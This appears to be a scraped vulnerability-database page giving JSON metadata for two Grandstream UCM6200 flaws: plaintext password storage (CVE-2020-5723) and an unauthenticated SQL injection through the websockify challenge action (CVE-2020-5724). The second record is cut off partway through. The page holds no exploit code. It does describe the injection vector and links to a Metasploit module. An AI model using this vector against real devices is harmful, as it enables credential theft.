Search criteria
5 vulnerabilities found for ucm6200 by grandstream
VAR-202003-1436
Vulnerability from variot - Updated: 2024-02-13 22:30The UCM6200 series 1.0.20.22 and below stores unencrypted user passwords in an SQLite database. This could allow an attacker to retrieve all passwords and possibly gain elevated privileges. UCM6200 The series contains a vulnerability in the plaintext storage of important information.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream.
Grandstream UCM6200 series 1.0.20.22 and previous versions have security vulnerabilities
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202003-1436",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ucm6208",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6204",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6202",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6202",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6204",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6208",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6200",
"scope": "lte",
"trust": 0.6,
"vendor": "grandstream",
"version": "\u003c=1.0.20.22"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6202:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6204:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6208:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"cve": "CVE-2020-5723",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-003514",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-20679",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2020-5723",
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003514",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-5723",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2020-003514",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2020-20679",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1713",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-5723",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"db": "VULMON",
"id": "CVE-2020-5723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
},
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UCM6200 series 1.0.20.22 and below stores unencrypted user passwords in an SQLite database. This could allow an attacker to retrieve all passwords and possibly gain elevated privileges. UCM6200 The series contains a vulnerability in the plaintext storage of important information.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. \n\r\n\r\nGrandstream UCM6200 series 1.0.20.22 and previous versions have security vulnerabilities",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"db": "VULMON",
"id": "CVE-2020-5723"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-5723",
"trust": 3.1
},
{
"db": "TENABLE",
"id": "TRA-2020-17",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-20679",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1713",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-5723",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"db": "VULMON",
"id": "CVE-2020-5723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
},
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"id": "VAR-202003-1436",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
}
]
},
"last_update_date": "2024-02-13T22:30:30.332000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "UCM6200 series",
"trust": 0.8,
"url": "http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series"
},
{
"title": "Patch for Grandstream UCM6200 privilege elevation vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/211855"
},
{
"title": "Grandstream UCM6200 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=113108"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-312",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.tenable.com/security/research/tra-2020-17"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5723"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5723"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/312.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-5723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
},
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"db": "VULMON",
"id": "CVE-2020-5723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
},
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"date": "2020-03-30T00:00:00",
"db": "VULMON",
"id": "CVE-2020-5723"
},
{
"date": "2020-04-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"date": "2020-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1713"
},
{
"date": "2020-03-30T20:15:19.883000",
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"date": "2020-04-01T00:00:00",
"db": "VULMON",
"id": "CVE-2020-5723"
},
{
"date": "2020-04-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"date": "2020-04-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1713"
},
{
"date": "2020-04-01T14:58:35.183000",
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UCM6200 Vulnerability in plaintext storage of important information in series",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
}
],
"trust": 0.6
}
}
VAR-202003-1437
Vulnerability from variot - Updated: 2024-02-13 22:30The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server's websockify endpoint. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the lack of verification of external input SQL statements by database-based applications. Attackers can use this vulnerability to execute illegal SQL commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202003-1437",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ucm6208",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6204",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6202",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6202",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6204",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6208",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6200",
"scope": "lt",
"trust": 0.6,
"vendor": "grandstream",
"version": "1.0.20.22"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6202:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6204:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6208:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"cve": "CVE-2020-5724",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-003469",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-20680",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2020-5724",
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003469",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-5724",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-003469",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-20680",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1714",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2020-5724",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "VULMON",
"id": "CVE-2020-5724"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
},
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server\u0027s websockify endpoint. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the lack of verification of external input SQL statements by database-based applications. Attackers can use this vulnerability to execute illegal SQL commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5724"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "VULMON",
"id": "CVE-2020-5724"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-5724",
"trust": 3.1
},
{
"db": "TENABLE",
"id": "TRA-2020-17",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-20680",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1714",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-5724",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "VULMON",
"id": "CVE-2020-5724"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
},
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"id": "VAR-202003-1437",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
